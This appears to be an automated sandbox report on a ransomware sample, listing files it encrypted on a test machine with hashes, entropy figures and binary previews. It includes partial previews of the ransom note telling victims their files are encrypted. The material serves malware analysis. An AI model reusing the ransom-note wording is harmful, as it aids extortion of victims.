          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.833022869757226
          Encrypted:false
          SSDEEP:24:eXA4WKtONncN79k/4ZRH09IX1Lo0OpHBPEXADn+zk7R:IA4FinY9k/mRHGS1tOhBku+Y1
          MD5:33BC490EE4636380E641079585D9863F
          SHA1:15BFC74BBD456682C0343F9D212692B6F6B46FB7
          SHA-256:D4ED9AB21ED1DDCE8344EBF89AA64AF50B98E96672D4DABA57B83C60E3950192
          SHA-512:4B9436F29EC06808F1C6C2F2E6C60D6D417FBC4DBA37B8191C5898CED4AEA7B6CF5DA33B8FB72D101B3D8851D3860F24B9D3B6143BED4D72C38F42E873C53A35
          Malicious:false
          Preview: .v..%H.|..dp.'D...9.d..2@j.M8?..L.....P...CU..w.zB....NZ.>l.M.....$.5.G....2............Cr..iI..H....@.tUi...^h<.H.....!....&..i..Y@#HN#.|...r.....,Y...@Mb...p.......r.W..]b..j...?+.N...3....)."..G+0R..j9..k.<.....8..8}S'w..j.U..o.(......$..a..Ky..=...Ak...."c.'..e.7#..}j.i ..E..x...)....o?....b..2......ET|.iu-.".....{.9 .Y..V..8..#N....> ..:$...mt.$.h=w....8._.A9<.E....?..Nn@.v.E..&.95..R..a.F!...r.i./I.x..e....(uCE.'.......3.h.7..B@..@.M.*..:.|...P....I.)0.......jD~.%v.G:."3.... M..0....J.E...6i..._#d0..B.....2....x...."..,..d.LLNQ5_2..!..#....{J,7...*7f.%fk...+=..$..0.x..gt....4.-...Q}$....{...%......(e.d....J..`.Yq=...5..c...{.`u.J. WD...)*N.;......b.0.Z.U@`~.s.s%_d.b.G&..C...C.|...],....Q`9.Z?.k..4..Bgp.............Pp..}..Z.j..2..8.....N.h..2...'.b...I.Q..G....#.Ub.........'`t.6...J......".]..>..[...a.....CS.......\..-$.v.C.p0u ..H.....e...P.....O...[4..j.z..........$Q{.y^K1~.Q..R..|...#=K .C.......0.(.:.n...>?.0}J.9..
          C:\Users\user\Documents\VAMYDFPUND\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841086855452462
          Encrypted:false
          SSDEEP:24:m4gESr+r7UXwsdcf1L0N6hEDSPgq+L5saJtmAwXADn+zj7J3:m4gESr+riDdom6hE4QL5REAIu+zJ3
          MD5:4F0E895E7CD7F027F2A11497CA203F71
          SHA1:AF18019D29C9BE80E27B0B819CF4E67B95269B43
          SHA-256:35946947CA0BBB464413AF4F48A6132EFAFF94E12150A7BC11208341B88AEA76
          SHA-512:506DD497A12F29A49C68C3FC5665128C85B1186706E381878685F486902FA04373DA73362A5DC5408308B9FC11BD4382F504A04FE609A3C47E50E1BF0106BC20
          Malicious:false
          Preview: ..],..A.{V<..D.z..5.l.....JS......%...3.......6.~]@..B.&P.R...VJ...U...3X$.{nO..m.J...aP6...Z5y...........s;&.....{...s..?x6".SF...nfb.|...9....C6.....J..i.......99.K.e..r.k0..>!.a.... ...#./...@.F.h...o.`Py.F6...i.H.pX.....oY.*.6.Fv.....!.?..._......P:.VL....j......p?q...s.d.X&.........y&8*.!\.usXaUdk..)%.J.w...jT..T0....~......J.0...p..N..z.]..;=U..LM...B.vb............g`....VZ8....{.;.......?cr...|.8.X./...t...(.s.}..."_Z.(...#..gV..$J0.4.G.B.;.2|%./...e`..A.1..#.C..0.S?BL.Zw.$c..X..s ........_.@...g.N...i.rI.+l.+Z....8|.V$hAi].=.C...L..o9qo%........=..OE. 5...%.s2u..........T)e..0..].L.{}G.x..hp..,....].w.y..!f..u^..1n....I..8.`.G.~.YX.......G.Y.... .Y.G.dT.C...}.C..@f!BH=..R..K.3.a..r...../.4..T..a`.....9.@.I:k....6'....x.R.....U..J.|...bb}.._%.c`}5c0I.S..5J..A..$ 2O1.^...H..J~L..........y..T5..I.@m.$...s.@*..(.........i.J..A............&"..1....^....Pz..]j1......o.+.Y.U.B..sL....,.d..y.9B.B...o....;...5.*...Z.......;".\.../z.r.
          C:\Users\user\Documents\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.851430227081893
          Encrypted:false
          SSDEEP:24:uZkyT0FBT+EoNR5QrA3SBzHxfofPTaG2SvHXADn+zQmQ:u2+gBT+XNQrLTofLu23u+6
          MD5:2C32153F30758B3904D36DE7DF45226B
          SHA1:136A2A31EF9C90491BFCCDED3372EA9E86B117F7
          SHA-256:E563E8A0755C81E381FE906B7C5DA65520B7620C668D8E6FE616519503B634C8
          SHA-512:C87A8BA5142DFDA075F4FADF89488070904ED0B348FBF219FB8DD12852C6C70A11C674F6C1AF804CD7C55CC66360FB023636E6E3B12C4807EB46936D8726B535
          Malicious:false
          Preview: .gQ.M.|..E...k.....R.P..j..`.....~cQt.R.(I......v..#...U.....3,......&..!?3..=^..Q.i..3.4.e.*cd..v.o..k.*..=C..6g.;.........3'n...x..oM.2...`T....U..sH...>..*[.i....L.........e..p.....6.A4.]s4.bi....%..!.....q..8V...=..x..qx....m9.S6......83..a|5..........g.A.........D|...l1B.+24xxV.8V&.._..dlX....D.]...Q.._..x-.9....d.wtq.j].....p. }U.....,G.q^./.{...zH...y..........$.M.k...PRX.i.$..~S..:.;.PS...3.[..*..~-.I..2..R....0.C...J+.Sc.O8V.Y...4....W..[..>..:./K.%......V..:...X.8.db..#.....r..-.e2!.....!....t....q.E.5<K.1.:....(.*...6^.F..\.WqH}f^.a..g......."..#.@l.._.&.D0V...PP...6Equ.f"5&`...(.s..........m.J}...S...U3.5>..:!btS.L+n...XU1.w$..#.^..........w............. .:X...< _..:..hn..h.D.~.Fy..-QWO...x.". ..T....:..[D[.'.a$YI?E.......Z..a'Qh'w.G.G..b.pm......H...}G.jWC_....JDf)aU9....$n..N..d..`..;p..P.=.c...PR#......M......Y.._.hRZ.7.yLp.GO...3>.....WF{.z.a.0..K.J.{.| ..J...KV..J......^C.).B.s.(..DA.G..3.>...+....a.x.B...d.Q#..F.).i^
          C:\Users\user\Documents\WKXEWIOTXI\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.86710007370703
          Encrypted:false
          SSDEEP:24:rc9jXmmHZEbpAJOjnWdJTO9R8U6k9jmyoBHozzfYPIFRXKsWvaRPeaXADn+z6:rctfHZEbyJOjqt0iIjCBHAXFpavaJu+W
          MD5:B990AA9C983C5928F972B99662FA208D
          SHA1:9A612C0956F617F6E26457A079E0371B6734961C
          SHA-256:DB0D3DC9100159BE6B846290C2F2155C636DE7F2B6086E461F8959AA23932453
          SHA-512:2AA484306632019F022B59080051ED98D05B6CE5A2038323875CA62FABC0548CB2431803B749EA0837BBC99B6C5D5ABDDB8E2070D214199C4BE08A197F7EA82C
          Malicious:false
          Preview: ..^.D.wAm...k...*.8fxO'.t.=M...@...1$.`..../..iVy......`..m.....1.S+~@...a...U.... .u;..yI..,.s.....9...3.....l.E.9.H....h9..'p#c.7..l<.T..@3.Nx.`.X..2rpPR....s..u.2am...$....RZ...#.8rq.....m..|.m..SCC(...3.....R!#/%.t..F.+O......iC.5.0ZJ.C...!C.Q.Srmm2.o..-j*.....t...}..D....p..Nv...JN....[..s.E..p.....+.m#.k.@..}<.....*(h.]...}...x.c/..0.iKo..L..;R(.(n.......B.......g.V..I.F ...;....B?..K.L."'.dVN.......MT....X..=..n.FKq..._Z..'....J.a.._B...#.8......D#.g.M..,...^.b..[,..C.@.4.3.2....N......./.+i.r.1.)<..!.zD....m.G ..}i..Iw.-........5..;.....P.j...R.C...8..b.Qmf..h.e..$...V]9D..W..G.......2%.(..B..:8.&.(z(..?..3;p2....*6....."xWm..8..kW......?.[6.gD=E6.Y{o.t.............>....B.J...B....z...<.-`r.D....8......B.~.~.*.A....[x..Ae..7.B.J.....l...Xv.6d4V{...r....w......v....:.;..-J..>.S.~I..54y]..F......n.e.S....h.{L....4.z.1....w..q.B.q...lb7^...z:.}O..G..Tu...H).....5W.^.5.e.A}.-..t...k..?`.:.....D.....>....i.....(\sF..*... ....!
          C:\Users\user\Documents\WKXEWIOTXI\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825084333626184
          Encrypted:false
          SSDEEP:24:xPM4sxwMWX8wj372kD0ZER+IKKKgGkNNsXADn+zaZ+m:xQxwMoHPKgGkNWu+W+m
          MD5:7F4EB4F5B83A91D670C13C884BCAEA52
          SHA1:AF5BE6750947E1508525B82B823089B8D4B42909
          SHA-256:AD8D20BADA4EAA54965D68C62E59FDACEA7813BAD2024E0C29ED0C43E5ADA5CE
          SHA-512:74B4D41674219975E990A1AF2A6FCAD915EF6C619A8D11613A10A9B659BE7E8DFFFCBB1EB82D08686AC810611CCD256079D834B3AD40764B7E62835BF9C56943
          Malicious:false
          Preview: .'..H..}....`.^.7=.@(.@...@Q...y.e..go....\.X..Tc..x.S..cY.....jb.........b.|.2.6;.>8P.p.HF.....M.V.....C./.H.v._.|.}.cEG.v..dB<..0.9...T.p.........5I..f.). ..W....#.....L..m.m.'.B.$..@.xsV<.T:.....6&$^....CK5.....Vc`w...v.k...l..=&...0..ThAJ...M.....O4.s..-.......%.c+!..mwl.\...[fb.Y.3.7|..%D%.-`.4...l....h........+....?_..k..l......$......p\..R}(j...B....-*%.^%..!.I.h.b\*./.ly.....!........o..e).........d..6..`\.k.$.o...&..[......|...6.ZC5S.-....m1d.K.!..E.....E..>%.k...+...N.3..rz..X5.k..do..z...9..xL*De...J....,..;d\P.3.R...!.._|.xke1.s.:.......l..g..T."O....@v"T.D..K(g.4Xx...W.f....N".....*..1_..v..m\U...=A..U.....>.L.B.8........DR(x....#.@_u.:Bl-..(...EW0..z....>-.%....S.D...x.Jk.;...N...."......K.Zsj...*..(S.:+w...7..x.n......[...R...).?..Z...-.Z....2...tD..*C.tS..T.soZ..._...C..p..,4:...@......s4<.6.u..[C......K..J.z..g........3~.>I.......{.+!...=...CZ..w?v99|j).....o.n..9....S.........n.....[...F..>......C.._]..p...1U.|..c..
          C:\Users\user\Documents\WKXEWIOTXI\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825774738380948
          Encrypted:false
          SSDEEP:24:ydhnAtNKq92woYQvU/lZl1cyaJhrLhs26pr35Mc+vxeDyEpFpxE2jmXADn+zH4I:yPq8CQ2bcyk9Lh7sracY4xfuu+L4I
          MD5:B88DE6A38D0AF86969558DC8168612D7
          SHA1:88F5F152C8B813860027F85C397006F1E00D85D1
          SHA-256:961C05C489943619A4380E6F867B74FB58F8C0BCBC0339BF608E9917DF67E4C2
          SHA-512:C18DE3BB339E7608FC979960B0281E189B5CF1F49A6427ED5C57394186552B8029098D28368862481313F2AEA49AE36577332E1E97845481689A3A01A8800580
          Malicious:false
          Preview: ..*...U..1w.<.j....L/.......%.'...9..._|............v:.b9}..O...8V.&...!<~...\....X.z>))......~G....--... K=.bXAEH8.........~B...?A.Yq.Lm.*..$@./.f...4... $...8..Vx}....2.3.^..!........Mn..E[.T.BE..8}..4..Q7..my..d.Hq.\z.........v..a0.b.o...b*k..........}...!....R:.....0...K......JjC%....m.C......`..nb...2...&C=..Q...+..7|...L......e..I.....x...H|j....O......j......|.T[_.8..Q...8E.....(]...4|./..)...O.1=z..i;............=.`?. 78.....j....O.'.z..b..U....{...K.G.K$W.?.+u0o.0=....Q..vg.5`.[..$..=.2....|zH...g.9..D..p.Q..e.la.<.....l..?...Z.q..T.P.3.U.Y..!...........o@..@...../u......c.Q....w}5.%.......-6........*M.~ru.vH.@.B...[./....x.......ey..v9..6.SA."F..1.2...g./I.].s...Vvh..96.....J.....q.......r.u...a..HGr:..........E..%s.8..\Y.............b0.(d.p..<....M..i&...X....c.VS..2.1...4.M..+/.3.[.E.c!d.EP..$S:.......&VC....5.Q.m:... .p...\=.4.......2!Y.{..b\.....9.'....R.-]1....69\j @..k.Ff....;....Z8.......i.s.. .7K W" ...4..z.....|U..%.. vP..
          C:\Users\user\Documents\WKXEWIOTXI\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8364108509355335
          Encrypted:false
          SSDEEP:24:wU8w4pjJymL7uvYl+vETkPPdDwtklTIA1BGVXbyrXADn+zN6FE:wU8vpjwmL711TIZ1OXWDu+d
          MD5:55BB60D4252B1335E739DA6044D93D37
          SHA1:A55C26B231153BF811188131F40E0CCDE69AE17F
          SHA-256:E50D1F2BBF879E957668B76E6ABC0B775C6235D85EA3F18F4C08EF69C0BEEFD2
          SHA-512:128B236EA1206ABF1D028315BE9F8BF431044B5CEC1CCC8B61437DCE55CCD1CE19FC2D9493E2F670EF22974DE11614337B5284006E94A4EA68027DBD1BB15A57
          Malicious:false
          Preview: ..;...Xy'..u...]..w....Ea..7.-&...K#.,S.l.Y....j.,.....0|b.*...=D.......o..h..a?..(U.RL.G....^.....2E.mY?P?[].3...|..}.E:.Z.P~ .s*;.U.$.R.ig.....',.yh........kQO...j-O.f.Ju...<0.T?.R...!y..mO3._`..9BCgt.....f:q...l..by...}>........n..r`1_*....[..^..E../...=..q...0.... ..KgZ...Ij...E.j.........<..]$A......EI......9..TX.n.x8am..O....%..b...7.......i..[&....A6P..{.]..&.G-..:......mW..u....X7..P.............o.9.od....\c.,....G..$2&-.....q....Z.K.....]...|.........OP.9 .."O....m!...J^3I"kp%.G.F.8#...k...iD....X...e!..={.<..#.".."...x....@.s.4i.b...i...=....Zz...h.....S....Q..!qWg^......3...,sB...o...3?..m....g/..E./.....~.2..i..j...&i.:}.IW....T..!....)DwCTW....E..L..2.........-...\.a>]...^6]....Y4..4L....5.............c..+,.........81%}H...SE.........Y..M..s.q.s,[..v.......\..Ok.b.....c.n.>K~.T.D9.k..<......L..K=....N/.]...:......<.2..N..Z=,`.X.Ef'...*..B.!.W..%b._k..........$..(.oji...C.L}i.B...I.6...w(..L.6..4a...a..0..M.uK-...H......1.....
          C:\Users\user\Documents\WKXEWIOTXI\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841301911364422
          Encrypted:false
          SSDEEP:24:t3pxrAU/iROfRVkn73gSpxRvhXKYcZ3n2DPpXADn+zJN:hriRSgQSXdh63Zn4u+L
          MD5:12A194563C4E2CC381659D1E5F389705
          SHA1:5C02B7C518AC5839FFA9E756C50B1D28597820FE
          SHA-256:BC704C37292C8CE5AB4D64D495D15A45FA5D4356C67C8160D26DCE28A2CE5E7A
          SHA-512:EFDF404E1101ACC642792D3733D9E0314A170C060F59B728858C9BF62958FB687AA180E556AF5779B973E48E215B83E443FCE39904176BA6F6666CADCF6D404B
          Malicious:false
          Preview: ...~..Og....P...W.l...X.J.P..A.."....=.$.f/y.h...y.....[8.b.Z....^.p.T9.m\.......b..MA..5X....}h....3...(.oe..u.}G.._.e.q...4..........8......,zQo..'.|r.....^........I.e.W...M[:RG.wt..S.%9...fp....R./...E.#...I..... ........U.....).h.d...H.......mh......#*.q...w9.pjO...%q.)...t.%f."r...T.&~(.v.6z.2...?....[L.C .. .Y#?.O|X...{.'`..B..%....^.lB.m...q.R.nKF@&.2&..X>n.o..Ef.`...HD../..O......l.j..$;..0...r.5V...X...9xCV.e.S.'.KQ{1.h:n.r.E..~l.K..idY..R...0{e.'.+G..I.....y........^..p.?.(...i.XY.....Y....7..;........."ZK...).*.K>..u.H?m../.._x...\...X.C....Wp`MD\.Zc...."@~...Y...^z....Q.1.I?.v.P.A..!...WM..I.....+..~/.../=.......5H.}qA.m.|....w..o;........4........n4.-.b.!...L..-zR..)V....f6..h.....|,..'u|...xi.....p..S. k.^......R.%...d.H.T1Z.n..f..v.~..%]M1.v.9f.8.4..r....M....Z..ev<..!.D..T...H;.......Y.9S.-..x..U-T;'..r...~..."..+...W&..M..i.*.-oQy..z*v.... >..-........~-.Hf.b..........Qm.].>..DTg.0...l..B..lLk..?........V.....V.}o..'|..d.,.U.DoZ.m..
          C:\Users\user\Documents\WKXEWIOTXI\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838716703928943
          Encrypted:false
          SSDEEP:24:TcIbz9ZgBLCmc9Pg6hX50wLVUYKjjH+18OJkuXADn+zYvG:DEi/X50wLJ19nu+UvG
          MD5:E2EEF6984AF40939C8F9F644042CD8C1
          SHA1:9040144C7EBF06B1CC9C022867FBBAAE8AEBBAB6
          SHA-256:BB74173A6AC7CF492E03F02C56E7B8F98C2E04A70E4F39D1D5689E0F465A9211
          SHA-512:0F0F8E75DA18DFD75F978D3F65AA95CEB1182D171BB131BD761BBA87E306C54C8E8F8F5953F5778B99E2A3068E4CDB9F21CEA35B4F5CEDE529AE39A23263FD3C
          Malicious:false
          Preview: ..qnWZ+c..K..pe....z.G$....3..Q....h).L.5....x...wu@.m../...'b./......l*t.D...$T.t..#....9..<v..n.[.XA..M.....g...8...J0...u.8.ag...=..xu...x).....[...Y....R..Z.a..}.g...{.U..J.;....[A)Z3..A+y.+..-..p.Q.{+H....y.^..G.R..}.......g..t.....A.#.rwpu..3N........f....~9df..|...k..............(WD..S..4....U\..C.36..JhR..J....{..{.<Zf..u@..'~...%..@.m.m'G../.!..To.F.Q.VN...c...n"m.?...Bm$NL.'....N.E.<k.>...w... .I...g`..m*F...4...Rl.........-.........." ..]...X.p.m..c=B.Y..sp..^bl_...T<u**..eG..|.D3....1.e]E....c...b!L..,...s.t.3..8.).;.*......PB....D[..........|S.:..%.C..hF.B.T....s."5.G.I.....V@ $.u=.J.jJj... .q..w..X.W......V...7.3....Pb7y..)..V..:.:..k. y.....u\...Y........I.@.u.'U:.. U....'..e..m.O9.`J.b4G..}"].........Djc..xh..W{.V.f....XP.......8...w,.m....L...yF.\.#.0o.Y0.=.[C..o.$'.c..C4=..P......ebC.R.p.......&..Y:3.D...C%...&...i....G..b.N.Yc..L.`_.._..f.....OP.j.>...b.%.R..U....A.h../.c......PP...,.b.)R........L+.f.f.l;.GyXa...#...<.8uT.b4r..uiZ@RF
          C:\Users\user\Documents\WKXEWIOTXI\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.866772253396331
          Encrypted:false
          SSDEEP:24:xiLMmyYQaw77mMLiYxbSTY8u/2c6o/PnHFc9lfNpilNGYpXADn+zWVd:kIJYQ3L15svVcH3HFcrfbilNG0u+CVd
          MD5:02F39AABE0FACF3AC98249BF392BC64A
          SHA1:137765A52463F0D6B9543232686D1CA4832BF85E
          SHA-256:66A9B291EBDEC183E17A1F8A74AD999C43920A4B5B3E17C2937ECEFB39D06CE6
          SHA-512:2EBD0E5259FF33ABED26F7DC544DCD8FFAA76DE1076B2C247A08230EA80893275A6EC24C88CBB760FACA6CA6F5C0F6355408F27253ADF08A2E8F8707A8E7BBB9
          Malicious:false
          Preview: .. .........N..\..G}YXwV...Fl/....4...V.{....*.tb...m.......ZQ...:Q..+...I.p/.....[0.."G............6.?.#.s..H|.(...S..p.J.lx-v3.).Z.P<6&....0....v..M....6...V.W?%'.|..+... ..L.`.b.{.m:s....KG.kh...........K......$..-..?3..h..o8J..8...^^Hz........w?.D.|.<c.t..x...\....&YQWc.....I^k. X!|.D.9s......-..B.R.Hr.A.........d^E..rB.x.X..*YeZJ5..Q.4.....L......b.."5Q.."V......) ..\......Y%.Qj.|.....{.C.....r...".....-..Z.-.SF..."...,......=.8......T._e.......]6@..n4iX.......I."PE..m.<i.~5....IF...r...%{t).qqe...v[...n......$_ag....!.O..">."T.a. ji...]..zZ..,...!..@..4....6...3,.<0\..X.g'.k.R....f...C....l6.V-....M........-.o{.....v.....=Y.........Rj...../p...T.o..>.p.Lhjo+>B...fb....C.>O.PN.]9}L.F..e..J....&.....(E...'./.0.j.tM$.Z&.....C.c.^..>|...6.7..~......`$-..=..}.y..Wq...S...%.@K..._8zUR<.&.2K..E..:..N..D..'.~!A...V.......7...D\ @...sW.a..T=a.1..{.^.=......%-1.l.!u......$...Ej...........nq.qz.]]..*..P.~,.S.}.+.i.Z.5%..
          C:\Users\user\Documents\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854343158705853
          Encrypted:false
          SSDEEP:24:0uUZxyKscVIAhPG1zgN83Nc9Wcgh+Li78uIk+p5czbCpXADn+zdwn:0RIp1AhPMgCNc9Wcoai7YLeK9u+hwn
          MD5:169A3D4A7E305A94AF6196EC6216D778
          SHA1:37B74BBA3659C98395B48B3A9CE5F27A99632D95
          SHA-256:A518467C37B34F9EF4D903349749A3CA10866761446E2020B040365D9438121B
          SHA-512:845C98A192C0B586F61D106EF013013DC4D3A109D3DBAFF21B530D7849865B17C6629042D71462C0C5E2ECC663C154E2D5ECBD5836B4376F16C4D06E47CA5966
          Malicious:false
          Preview: Q..Ou.|...ag1|V.....E!...=a..+.RJ.F.G'.Q.H.]mdTA(..bJ...{.........226..i..y......*p....x.%./..(._....[TU#b.WB..~2W..K...Y#9..5].......\[.zGD].........=A;.,(...z....|...r@..D.%D.r...;..<w...$.'...I&.u.;?.{.h^Q.......[...*... ..Pk.N....d>..."Y..t.]t...=..C...I....*..G:/MH.g..Y3.3.fy9Z'/.1{...pRo.....}A..m^.YG6..I.T.af.....1......X.`f....L..t....V...rn.k.H...DPu...@...QF.......Z..J.....S-]W.I....c.iV.......H..1[.|..e..3..iu"0cy...,14w{...u._..g..#.Y.B.G.&u..@....;..^..A.M.j.`.O......7R...T.".1.w....SL.....6.....IY o#.d.~...Rxt..e....Z..X..w.5M.M..q..mMc.\j.......!.EN.T...O...P%_.,K...3.^u...|._.d.../..G....ai.......>Y....M....MZ.z....vNU.8.#)....;>...f.$,4..Qt..g..Y..\...4..q....3M.0.?7...Dd.%V9xl.[.M[.9..G...Vf....Q.....8..N<&.....4).:&X%....B...4.Ra....T.....,.!..].EZ.".6..C.....j......;...B.y.X.Y..f.n..u..lD...n.?^w.{'(.Q...4z..$U.br.R.=..........W`&C.r........)...>.\d..B._q.=.+=..#.....6.2....zC|...k/.Fj..J.Hjy...T...z..D...S.UB..r.i..>.
          C:\Users\user\Documents\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841022616373543
          Encrypted:false
          SSDEEP:24:XuBNUFtqiGZlSM7Wt3cgu4agn6822trTLXADn+zJIr:XuU3KX7i3K4aK6822trTju+Wr
          MD5:E1462FF44D588A3C4D473973A6A8CD9E
          SHA1:CC7CE60DE0CD1B4579AAEF3B97C21DCAA4C33374
          SHA-256:3F19DEA96064DA4A2A6482BA9C1091C6D95A538389F072EAAFA66C4F7AB02AC4
          SHA-512:79DA2EBD27503CD0F9B7D1D7C6DA7A98CE6CE859E08226471CEEE4178AC37BAB7FAFF47ED9FB28AF3536089E13CE487FBC24EF27BB9E2B1EF802C651316A0DFB
          Malicious:false
